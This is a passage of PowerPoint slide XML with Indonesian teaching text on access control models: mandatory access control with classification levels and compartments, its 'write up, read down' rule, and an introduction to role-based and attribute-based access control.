            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>fleksibel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sebagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> model MAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menambahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kompartemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> file data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>berada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>klasifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> Rahasia dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>terletak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kompartemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> SDM. Hanya </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> Rahasia dan SDM yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Dalam MAC, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>diizinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menulis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dokumen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>rendah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tulis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>baca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>bawah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> Sangat Rahasia </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menerbitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> data Sangat Rahasia yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> Rahasia</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72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2175106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Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Akses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Peran dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Atribut</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penetapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersifat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fleksibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> MAC.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Akses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Peran</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> (RBAC) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendefinisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izinnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tugas-tugas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prinsipal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dialokasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bawah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memodifikasi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicadangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
